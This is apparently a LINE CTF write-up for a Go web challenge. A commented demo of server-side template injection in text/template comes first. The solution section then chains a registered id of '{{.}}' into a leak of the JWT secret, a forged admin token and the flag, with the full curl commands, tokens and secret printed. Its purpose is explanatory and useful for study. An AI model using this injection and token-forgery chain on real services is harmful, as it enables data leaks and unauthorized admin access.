// SSTI is the value handed to the templates in main. It mixes an unexported
// and an exported field on purpose: rendering the whole value with {{.}}
// prints every field, unexported ones included, which is the leak the demo
// illustrates.
type SSTI struct {
	privateMember string
	PublicMember  string
	value         int
}
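// main renders one SSTI value through three templates to show how much an
// attacker-controlled template source can reach:
//   - {{.}} prints the whole struct, including unexported fields;
//   - {{.PublicMember}} reads a single exported field;
//   - {{printf ...}} calls a template builtin.
//
// The original discarded both the Parse and the Execute errors; they are now
// reported on stderr and the program exits non-zero.
//
// NOTE(review): the file's import block is not shown here; text/template is
// assumed — confirm whether text/template or html/template is imported.
func main() {
	ssti := SSTI{
		privateMember: "private",
		PublicMember:  "public",
		value:         1,
	}

	// Abort on the first template error rather than silently skipping a line
	// of output, as the ignored `_` results did.
	fail := func(err error) {
		if err != nil {
			os.Stderr.WriteString(err.Error() + "\n")
			os.Exit(1)
		}
	}

	// Template sources are kept byte-for-byte from the demo and run in order.
	// The source text, not only the data, is what must stay trusted: the
	// first one dumps the unexported field alongside the public ones.
	sources := []string{
		"Here is {{.}} \n",                      // print "Here is {private public 1}"
		"Here is {{.PublicMember}} \n",          // print "Here is public"
		"Here is {{printf \"%s\" \"asdf\"}} \n", // print "Here is asdf"
	}
	for _, src := range sources {
		tpl, err := template.New("").Parse(src)
		fail(err)
		fail(tpl.Execute(os.Stdout, ssti))
	}
}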
0x4 Solution
Register a user whose id is `{{.}}` via /regist.
Obtain a token for that user from /auth.
Use this token on /: the id is rendered as a template, so `{{.}}` dumps the whole user object, which exposes the JWT secret (fasdf972u1031xu90zm10Av).
Use the JWT secret to forge a token with is_admin set to true.
Request /flag with the forged token to get the flag.
$ curl --request GET 'http://34.146.226.125/regist?id=%7B%7B%2E%7D%7D1&pw=asdf' {"status":true,"msg":""}
$ curl --request GET 'http://34.146.226.125/auth?id=%7B%7B%2E%7D%7D&pw=asdf' {"status":true,"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOmZhbHNlfQ.rthp4OaE1Iau8Q9PIxoB-F9VGukYpbX1I-GpPPDSGhM"}
$ curl --header 'X-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOmZhbHNlfQ.rthp4OaE1Iau8Q9PIxoB-F9VGukYpbX1I-GpPPDSGhM' --request GET 'http://34.146.226.125/' Logged in as {{{.}} asdf false fasdf972u1031xu90zm10Av}
$ curl --header 'X-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOnRydWUsImlhdCI6MTY0ODUyMjgzMn0.nsbn28xiVYZkPPJqAJYv01PEGYuugWBIyriBaB7hcIY' --request GET 'http://34.146.226.125/flag' {"status":true,"msg":"Hi {{.}}, flag is LINECTF{country_roads_takes_me_home}"}